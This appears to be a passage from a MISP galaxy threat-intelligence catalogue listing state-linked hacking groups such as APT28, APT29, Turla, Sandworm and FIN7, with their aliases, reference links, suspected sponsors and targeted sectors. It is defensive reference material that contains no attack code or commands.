targeted-sector | ['Opposition', 'Dissidents', 'Political party'] |
Rocket Kitten
Targets Saudi Arabia, Israel, US, Iran, high ranking defense officials, embassies of various target countries, notable Iran researchers, human rights activists, media and journalists, academic institutions and various scholars, including scientists in the fields of physics and nuclear sciences.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rocket Kitten.
Known Synonyms |
---|
Operation Woolen Goldfish |
Operation Woolen-Goldfish |
TEMP.Beanie |
Thamar Reservoir |
Timberworm |
Internal MISP references
UUID f873db71-3d53-41d5-b141-530675ade27a
which can be used as unique global reference for Rocket Kitten
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing - webarchive
- https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf - webarchive
- http://www.clearskysec.com/thamar-reservoir/ - webarchive
- https://citizenlab.ca/2015/08/iran_two_factor_phishing/ - webarchive
- https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/ - webarchive
- https://en.wikipedia.org/wiki/Rocket_Kitten - webarchive
- https://www.cfr.org/interactive/cyber-operations/rocket-kitten - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Saudi Arabia', 'Venezuela', 'Afghanistan', 'United Arab Emirates', 'Iran', 'Israel', 'Iraq', 'Kuwait', 'Turkey', 'Canada', 'Yemen', 'United Kingdom', 'Egypt', 'Syria', 'Jordan'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Activists', 'Defense', 'Journalist', 'Research - Innovation', 'Academia - University', 'Government, Administration'] |
Related clusters
To see the related clusters, click here.
Cleaver
A group of cyber actors utilizing infrastructure located in Iran have been conducting computer network exploitation activity against public and private U.S. organizations, including Cleared Defense Contractors (CDCs), academic institutions, and energy sector companies. This threat actor targets entities in the government, energy, and technology sectors that are located in or do business with Saudi Arabia.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cleaver.
Known Synonyms |
---|
Alibaba |
Cobalt Gypsy |
G0003 |
Op Cleaver |
Operation Cleaver |
TG-2889 |
Tarh Andishan |
Internal MISP references
UUID 86724806-7ec9-4a48-a0a7-ecbde3bf4810
which can be used as unique global reference for Cleaver
in MISP communities and other software using the MISP galaxy
External references
- https://www.secureworks.com/research/the-curious-case-of-mia-ash - webarchive
- https://www.cfr.org/interactive/cyber-operations/operation-cleaver - webarchive
- http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing - webarchive
- https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations - webarchive
- https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/ - webarchive
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf - webarchive
- https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf - webarchive
- https://attack.mitre.org/groups/G0003/ - webarchive
- https://xorl.wordpress.com/2021/05/06/iran-cyber-operations-groups/ - webarchive
- https://www.secureworks.com/research/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles - webarchive
- https://know.netenrich.com/threatintel/threat_actor/Cutting%20Kitten - webarchive
- https://www.cfr.org/cyber-operations/operation-cleaver - webarchive
- https://securityaffairs.co/wordpress/33682/cyber-crime/ali-baba-apt-middle-east.html - webarchive
- https://scadahacker.com/library/Documents/Cyber_Events/Cylance%20-%20Operation%20Cleaver%20Report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Canada', 'France', 'Israel', 'Mexico', 'Saudi Arabia', 'China', 'Germany', 'United States', 'Pakistan', 'South Korea', 'United Kingdom', 'India', 'Kuwait', 'Qatar', 'Turkey'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Defense', 'Energy', 'Technology', 'Government, Administration', 'Academia - University'] |
Related clusters
To see the related clusters, click here.
Sands Casino
Internal MISP references
UUID 1de1a64e-ea14-4e79-9e41-6958bdb6c0ff
which can be used as unique global reference for Sands Casino
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
Rebel Jackal
This is a pro-Islamist organization that generally conducts attacks motivated by real world events in which its members believe that members of the Muslim faith were wronged. Its attacks generally involve website defacements; however, the group did develop a RAT that it refers to as Fallaga RAT, but which appears to simply be a fork of the njRAT malware popular amongst hackers in the Middle East/North Africa region.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rebel Jackal.
Known Synonyms |
---|
FallagaTeam |
Internal MISP references
UUID 29af2812-f7fb-4edb-8cc4-86d0d9e3644b
which can be used as unique global reference for Rebel Jackal
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TN |
motive | Hacktivists-Nationalists |
Viking Jackal
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Viking Jackal.
Known Synonyms |
---|
Vikingdom |
Internal MISP references
UUID 7f99ba32-421c-4905-9deb-006e8eda40c1
which can be used as unique global reference for Viking Jackal
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | AE |
APT28
The Sofacy Group (also known as APT28, Pawn Storm, Fancy Bear and Sednit) is a cyber espionage group believed to have ties to the Russian government. Likely operating since 2007, the group is known to target government, military, and security organizations. It has been characterized as an advanced persistent threat.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT28.
Known Synonyms |
---|
APT-C-20 |
ATK5 |
Blue Athena |
BlueDelta |
FANCY BEAR |
FROZENLAKE |
Fancy Bear |
Fighting Ursa |
Forest Blizzard |
G0007 |
Grizzly Steppe |
Group 74 |
IRON TWILIGHT |
ITG05 |
Pawn Storm |
SIG40 |
SNAKEMACKEREL |
STRONTIUM |
Sednit |
Sofacy |
Swallowtail |
T-APT-12 |
TA422 |
TG-4127 |
Tsar Team |
UAC-0028 |
Internal MISP references
UUID 5b4ee3ea-eee3-4c8e-8323-85ae32658754
which can be used as unique global reference for APT28
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/groups/G0007/ - webarchive
- https://en.wikipedia.org/wiki/Fancy_Bear - webarchive
- https://en.wikipedia.org/wiki/Sofacy_Group - webarchive
- https://www.bbc.com/news/technology-37590375 - webarchive
- https://www.bbc.co.uk/news/technology-45257081 - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-28 - webarchive
- https://www.apnews.com/4d174e45ef5843a0ba82e804f080988f - webarchive
- https://www.voanews.com/a/iaaf-hack-fancy-bears/3793874.html - webarchive
- https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ - webarchive
- https://www.dw.com/en/hackers-lurking-parliamentarians-told/a-19564630 - webarchive
- https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/ - webarchive
- https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/ - webarchive
- https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/wp-mandiant-matryoshka-mining.pdf - webarchive
- https://www.eff.org/deeplinks/2015/08/new-spear-phishing-campaign-pretends-be-eff - webarchive
- https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2014/apt28.pdf - webarchive
- https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware - webarchive
- https://www.wired.com/story/russian-fancy-bears-hackers-release-apparent-ioc-emails/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government - webarchive
- https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/ - webarchive
- https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ - webarchive
- https://www.msn.com/en-nz/news/world/russian-hackers-accused-of-targeting-un-chemical-weapons-watchdog-mh17-files/ar-BBNV2ny - webarchive
- https://unit42.paloaltonetworks.com/unit42-new-sofacy-attacks-against-us-government-agency/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-let-ride-sofacy-groups-dealerschoice-attacks-continue/ - webarchive
- https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/ - webarchive
- https://www.bleepingcomputer.com/news/security/apt28-uses-lojax-first-uefi-rootkit-seen-in-the-wild/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-targets-mh17-investigation-team/ - webarchive
- https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/ - webarchive
- https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/ - webarchive
- https://blogs.microsoft.com/on-the-issues/2018/08/20/we-are-taking-new-steps-against-broadening-threats-to-democracy/ - webarchive
- https://www.lse.co.uk/AllNews.asp?code=kwdwehme&headline=Russian_Hackers_Suspected_In_Cyberattack_On_German_Parliament - webarchive
- https://www.volkskrant.nl/cultuur-media/russen-faalden-bij-hackpogingen-ambtenaren-op-nederlandse-ministeries~b77ff391/ - webarchive
- https://www.ibtimes.co.uk/russian-hackers-fancy-bear-likely-breached-olympic-drug-testing-agency-dnc-experts-say-1577508 - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-disrupts-apt28-hacking-campaign-aimed-at-us-midterm-elections/ - webarchive
- https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected - webarchive
- https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf - webarchive
- https://www.reuters.com/article/us-sweden-doping/swedish-sports-body-says-anti-doping-unit-hit-by-hacking-attack-idUSKCN1IG2GN - webarchive
- https://researchcenter.paloaltonetworks.com/2016/10/unit42-dealerschoice-sofacys-flash-player-exploit-platform/ - webarchive
- https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/ - webarchive
- https://www.washingtonpost.com/technology/2019/02/20/microsoft-says-it-has-found-another-russian-operation-targeting-prominent-think-tanks/?utm_term=.870ff11468ae - webarchive
- https://www.handelsblatt.com/today/politics/election-risks-russia-linked-hackers-target-german-political-foundations/23569188.html?ticket=ST-2696734-GRHgtQukDIEXeSOwksXO-ap1 - webarchive
- https://www.accenture.com/t20190213T141124Z__w__/us-en/_acnmedia/PDF-94/Accenture-SNAKEMACKEREL-Threat-Campaign-Likely-Targeting-NATO-Members-Defense-and-Military-Outlets.pdf - webarchive
- https://marcoramilli.com/2019/12/05/apt28-attacks-evolution/ - webarchive
- https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/ - webarchive
- https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/ - webarchive
- https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/fighting-ursa/ - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
- https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://bluepurple.binaryfirefly.com/p/bluepurple-pulse-week-ending-june-64e - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['Georgia', 'France', 'Jordan', 'United States', 'Hungary', 'World Anti-Doping Agency', 'Armenia', 'Tajikistan', 'Japan', 'NATO', 'Ukraine', 'Belgium', 'Pakistan', 'Asia Pacific Economic Cooperation', 'International Association of Athletics Federations', 'Turkey', 'Mongolia', 'OSCE', 'United Kingdom', 'Germany', 'Poland', 'European Commission', 'Afghanistan', 'Kazakhstan', 'China'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Military', 'Government, Administration', 'Security Service'] |
Related clusters
To see the related clusters, click here.
APT29
A 2015 report by F-Secure describe APT29 as: 'The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes show unusual confidence in their ability to continue successfully compromising their targets, as well as in their ability to operate with impunity. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States;Asian, African, and Middle Eastern governments;organizations associated with Chechen extremism;and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large - scale spear - phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations. These campaigns utilize a smash - and - grab approach involving a fast but noisy breakin followed by the rapid collection and exfiltration of as much data as possible.If the compromised target is discovered to be of value, the Dukes will quickly switch the toolset used and move to using stealthier tactics focused on persistent compromise and long - term intelligence gathering. This threat actor targets government ministries and agencies in the West, Central Asia, East Africa, and the Middle East; Chechen extremist groups; Russian organized crime; and think tanks. It is suspected to be behind the 2015 compromise of unclassified networks at the White House, Department of State, Pentagon, and the Joint Chiefs of Staff. The threat actor includes all of the Dukes tool sets, including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, SeaDuke, CloudDuke (aka MiniDionis), and HammerDuke (aka Hammertoss). '
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT29.
Known Synonyms |
---|
ATK7 |
Blue Kitsune |
BlueBravo |
COZY BEAR |
Cloaked Ursa |
G0016 |
Grizzly Steppe |
Group 100 |
IRON HEMLOCK |
ITG11 |
Minidionis |
Nobelium |
SeaDuke |
TA421 |
The Dukes |
UAC-0029 |
YTTRIUM |
Internal MISP references
UUID b2056ff0-00b9-482e-b11c-c771daa5f28a
which can be used as unique global reference for APT29
in MISP communities and other software using the MISP galaxy
External references
- https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/ - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf - webarchive
- https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/dukes - webarchive
- https://pylos.co/2018/11/18/cozybear-in-from-the-cold/ - webarchive
- https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hemlock - webarchive
- https://attack.mitre.org/groups/G0016 - webarchive
- https://unit42.paloaltonetworks.com/atoms/cloaked-ursa/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf - webarchive
- https://cip.gov.ua/services/cm/api/attachment/download?id=60068 - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['United States', 'China', 'New Zealand', 'Ukraine', 'Romania', 'Georgia', 'Japan', 'South Korea', 'Belgium', 'Kazakhstan', 'Brazil', 'Mexico', 'Turkey', 'Portugal', 'India', 'Germany'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Think Tanks', 'Government, Administration'] |
Related clusters
To see the related clusters, click here.
Turla
A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Turla.
Known Synonyms |
---|
ATK13 |
Blue Python |
G0010 |
Group 88 |
Hippo Team |
IRON HUNTER |
ITG12 |
KRYPTON |
MAKERSMARK |
Pacifier APT |
Pfinet |
Popeye |
SIG23 |
SUMMIT |
Secret Blizzard |
Snake |
TAG_0530 |
UAC-0003 |
UAC-0024 |
UAC-0144 |
UNC4210 |
Uroburos |
VENOMOUS Bear |
WRAITH |
Waterbug |
Internal MISP references
UUID fa80877c-f509-4daf-8b62-20aba1635f68
which can be used as unique global reference for Turla
in MISP communities and other software using the MISP galaxy
External references
- https://www.circl.lu/pub/tr-25/ - webarchive
- https://securelist.com/introducing-whitebear/81638/ - webarchive
- https://securelist.com/the-epic-turla-operation/65545/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/turla - webarchive
- https://www.nytimes.com/2010/08/26/technology/26cyber.html - webarchive
- https://securelist.com/blog/research/67962/the-penquin-turla-2/ - webarchive
- https://www.kaspersky.com/blog/moonlight-maze-the-lessons/6713/ - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf - webarchive
- https://securelist.com/analysis/publications/65545/the-epic-turla-operation/ - webarchive
- https://threatpost.com/linux-modules-connected-to-turla-apt-discovered/109765/ - webarchive
- https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/ - webarchive
- https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/ - webarchive
- https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf - webarchive
- https://yle.fi/uutiset/osasto/news/russian_group_behind_2013_foreign_ministry_hack/8591548 - webarchive
- https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/ - webarchive
- https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-control-in-the-sky/ - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/ - webarchive
- https://docs.broadcom.com/doc/waterbug-attack-group - webarchive
- https://www.theguardian.com/technology/2014/aug/07/turla-hackers-spying-governments-researcher-kaspersky-symantec - webarchive
- https://www.bleepingcomputer.com/news/security/turla-outlook-backdoor-uses-clever-tactics-for-stealth-and-persistence/ - webarchive
- https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf - webarchive
- https://www.melani.admin.ch/melani/en/home/dokumentation/reports/technical-reports/technical-report_apt_case_ruag.html - webarchive
- https://unit42.paloaltonetworks.com/unit42-kazuar-multiplatform-espionage-backdoor-api-access/ - webarchive
- https://www.engadget.com/2017/06/07/russian-malware-hidden-britney-spears-instagram/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf - webarchive
- https://www.trendmicro.com/vinfo/vn/security/news/cyber-attacks/cyberespionage-group-turla-deploys-backdoor-ahead-of-g20-summit - webarchive
- https://www.zdnet.com/article/this-hacking-gang-just-updated-the-malware-it-uses-against-uk-targets/ - webarchive
- https://attack.mitre.org/groups/G0010/ - webarchive
- https://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hunter - webarchive
- https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/ - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
- https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/ - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://cip.gov.ua/services/cm/api/attachment/download?id=60068 - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['France', 'Romania', 'Kazakhstan', 'Poland', 'Tajikistan', 'Russia', 'United States', 'Saudi Arabia', 'Germany', 'India', 'Belarus', 'Netherlands', 'Iran', 'Uzbekistan', 'Iraq'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Government, Administration', 'Education', 'Electric', 'Energy', 'Health'] |
Related clusters
To see the related clusters, click here.
ENERGETIC BEAR
A Russian group that collects intelligence on the energy industry.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ENERGETIC BEAR.
Known Synonyms |
---|
ALLANITE |
ATK6 |
BERSERK BEAR |
BROMINE |
Blue Kraken |
CASTLE |
Crouching Yeti |
DYMALLOY |
Dragonfly |
G0035 |
Ghost Blizzard |
Group 24 |
Havex |
IRON LIBERTY |
ITG15 |
Koala Team |
TG-4192 |
Internal MISP references
UUID 64d6559c-6d5c-4585-bbf9-c17868f763ee
which can be used as unique global reference for ENERGETIC BEAR
in MISP communities and other software using the MISP galaxy
External references
- https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet - webarchive
- https://web.archive.org/web/20161020180305/http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/ - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf - webarchive
- http://www.netresec.com/?page=Blog&month=2014-10&post=Full-Disclosure-of-Havex-Trojans - webarchive
- https://threatpost.com/energy-watering-hole-attack-used-lightsout-exploit-kit/104772/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/crouching-yeti - webarchive
- https://www.reuters.com/article/us-ukraine-cyber-attack-energy-idUSKBN1521BA - webarchive
- https://dragos.com/wp-content/uploads/CrashOverride-01.pdf - webarchive
- https://www.independent.ie/irish-news/statesponsored-hackers-targeted-eirgrid-electricity-network-in-devious-attack-36005921.html - webarchive
- https://www.riskiq.com/blog/labs/energetic-bear/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks - webarchive
- https://www.kaspersky.com/resource-center/threats/crouching-yeti-energetic-bear-malware-threat - webarchive
- https://www.sans.org/reading-room/whitepapers/ICS/impact-dragonfly-malware-industrial-control-systems-36672 - webarchive
- https://attack.mitre.org/groups/G0035/ - webarchive
- https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector - webarchive
- https://dragos.com/adversaries.html - webarchive
- https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/dymalloy - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 75 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['United States', 'Germany', 'Turkey', 'China', 'Spain', 'France', 'Ireland', 'Japan', 'Italy', 'Poland'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Energy'] |
Related clusters
To see the related clusters, click here.
Sandworm
This threat actor targets industrial control systems, using a tool called Black Energy, associated with electricity and power generation for espionage, denial of service, and data destruction purposes. Some believe that the threat actor is linked to the 2015 compromise of the Ukrainian electrical grid and a distributed denial of service prior to the Russian invasion of Georgia. Believed to be responsible for the 2008 DDoS attacks in Georgia and the 2015 Ukraine power grid outage
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sandworm.
Known Synonyms |
---|
APT44 |
Blue Echidna |
ELECTRUM |
FROZENBARENTS |
G0034 |
IRIDIUM |
IRON VIKING |
Quedagh |
Seashell Blizzard |
TEMP.Noble |
TeleBots |
UAC-0082 |
UAC-0113 |
VOODOO BEAR |
Internal MISP references
UUID f512de42-f76b-40d2-9923-59e7dbdfec35
which can be used as unique global reference for Sandworm
in MISP communities and other software using the MISP galaxy
External references
- https://dragos.com/blog/crashoverride/CrashOverride-01.pdf - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-163A - webarchive
- https://ics.sans.org/blog/2016/01/09/confirmation-of-a-coordinated-attack-on-the-ukrainian-power-grid - webarchive
- https://web.archive.org/web/20141016132823/https://www.symantec.com/connect/blogs/sandworm-windows-zero-day-vulnerability-being-actively-exploited-targeted-attacks - webarchive
- https://ics.sans.org/blog/2015/12/30/current-reporting-on-the-cyber-attack-in-ukraine-resulting-in-power-outage - webarchive
- https://web.archive.org/web/20141224060545/http://blog.trendmicro.com/trendlabs-security-intelligence/timeline-of-sandworm-attacks/ - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf - webarchive
- https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf - webarchive
- https://dragos.com/adversaries.html - webarchive
- http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks - webarchive
- https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt - webarchive
- https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine - webarchive
- https://www.welivesecurity.com/2017/05/23/xdata-ransomware-making-rounds-amid-global-wannacryptor-scare - webarchive
- https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine - webarchive
- https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back - webarchive
- https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/ - webarchive
- https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine - webarchive
- https://cert.gov.ua/article/405538 - webarchive
- https://cip.gov.ua/services/cm/api/attachment/download?id=60068 - webarchive
- https://packetstormsecurity.com/news/view/35790/Recent-OT-And-Espionage-Attacks-Linked-To-Russias-Sandworm-Now-Named-APT44.html - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/apt44-unearthing-sandworm?linkId=9627235 - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['Russia', 'Lithuania', 'Kyrgyzstan', 'Israel', 'Ukraine', 'Belarus', 'Kazakhstan', 'Georgia', 'Poland', 'Azerbaijan', 'Iran'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Electric', 'Energy', 'Industrial'] |
Related clusters
To see the related clusters, click here.
FIN7
Groups targeting financial organizations or people with significant financial assets.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN7.
Known Synonyms |
---|
ATK32 |
CARBON SPIDER |
Calcium |
Carbanak |
Carbon Spider |
Coreid |
ELBRUS |
G0008 |
G0046 |
GOLD NIAGARA |
Sangria Tempest |
Internal MISP references
UUID 00220228-a5a4-4032-a30d-826bb55aa3fb
which can be used as unique global reference for FIN7
in MISP communities and other software using the MISP galaxy
External references
- https://en.wikipedia.org/wiki/Carbanak - webarchive
- https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe - webarchive
